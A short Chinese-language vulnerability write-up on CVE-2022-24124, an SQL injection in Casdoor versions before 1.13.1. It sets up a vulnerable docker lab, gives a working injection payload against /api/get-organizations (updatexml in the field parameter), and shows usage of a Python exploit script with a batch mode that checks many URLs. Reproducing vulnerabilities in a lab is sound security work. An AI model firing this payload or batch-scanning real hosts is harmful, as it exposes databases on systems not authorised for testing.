Casdoor是一个基于OAuth 2.0/OIDC的中心化的单点登录(SSO)身份验证平台
CVE编号:CVE-2022-24124
CNPD编号:CNPD-202201-7304
危险等级:高 ( 7.5 HIGH )
POC/EXP:已公开
Casdoor < Casdoor 1.13.1 //1.13.1版本之前均受影响
此漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。
拉取漏洞镜像
docker pull vulfocus/casdoor:1.13.0
启动漏洞环境
docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0
打开漏洞环境页面
使用POC构造payload
POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)
python3 CVE-2022-24124.py -h
python3 CVE-2022-24124.py -u http://127.0.0.1
python3 CVE-2022-24124.py -f urls.txt
https://nvd.nist.gov/vuln/detail/CVE-2022-24124
https://github.com/ColdFusionX/CVE-2022-24124
https://github.com/0xAbbarhSF/CVE-2022-24124
借鉴于https://www.t00ls.com/thread-66989-1-1.html
练手写了一个python版本的,并且加了一个批量检测的功能